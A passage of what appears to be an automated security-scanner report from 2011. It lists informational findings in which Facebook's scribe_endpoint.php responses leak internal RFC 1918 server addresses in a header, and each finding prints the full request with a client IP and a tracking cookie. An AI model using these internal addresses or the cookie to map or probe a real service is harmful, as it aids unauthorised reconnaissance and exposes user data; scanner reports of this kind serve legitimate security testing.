Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3736394e4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1de4dacf4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.182.57
X-Cnection: close
Date: Thu, 16 Jun 2011 15:41:53 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.490. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.21.33

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A3201%2C%22baseline_elapsed%22%3A2491%7D&asyncSignal=4999 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3230385f8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff356d7ba3c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.21.33
X-Cnection: close
Date: Thu, 16 Jun 2011 17:30:36 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.491. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.179.53

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1208%2C%22baseline_elapsed%22%3A1208%7D&asyncSignal=2681 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df340b9c87%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff34167b284%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.179.53
X-Cnection: close
Date: Thu, 16 Jun 2011 14:03:45 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.492. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.211.108

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1505%2C%22baseline_elapsed%22%3A1522%7D&asyncSignal=197 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.27.211.108
X-Cnection: close
Date: Thu, 16 Jun 2011 13:53:23 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.493. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.239.54

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A360%2C%22baseline_elapsed%22%3A360%7D&asyncSignal=3237 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df55879b04%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff399bdf3c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.239.54
X-Cnection: close
Date: Thu, 16 Jun 2011 11:54:32 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.494. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.210.33

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1%2C%22baseline_elapsed%22%3A1%7D&asyncSignal=7073 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df30155a9dc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff321cafa4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.210.33
X-Cnection: close
Date: Thu, 16 Jun 2011 17:35:41 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.495. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.189.60

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1779%2C%22baseline_elapsed%22%3A1770%7D&asyncSignal=9313 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df102156e5c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1aa8c6f18%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.189.60
X-Cnection: close
Date: Thu, 16 Jun 2011 14:45:04 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.496. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.235.34

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A318%2C%22baseline_elapsed%22%3A320%7D&asyncSignal=8122 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfa6e51a98%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f74f00e4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.235.34
X-Cnection: close
Date: Thu, 16 Jun 2011 12:56:34 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.497. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.52.55

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A184%2C%22baseline_elapsed%22%3A1230%7D&asyncSignal=7711 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df5518899%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff25942f924%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.52.55
X-Cnection: close
Date: Thu, 16 Jun 2011 16:54:15 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.498. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.172.63

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1539%2C%22baseline_elapsed%22%3A1537%7D&asyncSignal=1457 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.172.63
X-Cnection: close
Date: Thu, 16 Jun 2011 13:37:52 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.499. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.33.19.120

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A10506%2C%22baseline_elapsed%22%3A10540%7D&asyncSignal=263 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1850dd0e4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff15c9a2904%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.33.19.120
X-Cnection: close
Date: Thu, 16 Jun 2011 12:30:55 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.500. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.209.57

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1531%2C%22baseline_elapsed%22%3A1531%7D&asyncSignal=3988 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.209.57
X-Cnection: close
Date: Thu, 16 Jun 2011 12:46:15 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.501. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.89.81

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1751%2C%22baseline_elapsed%22%3A430%7D&asyncSignal=443 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df22e9b92d4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff324587f18%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.43.89.81
X-Cnection: close
Date: Thu, 16 Jun 2011 15:26:25 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.502. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.224.128

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1731%2C%22baseline_elapsed%22%3A1731%7D&asyncSignal=1788 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.32.224.128
X-Cnection: close
Date: Thu, 16 Jun 2011 12:30:43 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.503. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.35.44

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1596%2C%22baseline_elapsed%22%3A1560%7D&asyncSignal=1090 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.35.44
X-Cnection: close
Date: Thu, 16 Jun 2011 13:01:40 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.504. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.186.55

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1952%2C%22baseline_elapsed%22%3A1952%7D&asyncSignal=5386 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.186.55
X-Cnection: close
Date: Thu, 16 Jun 2011 11:25:09 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.505. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.229.64

Request

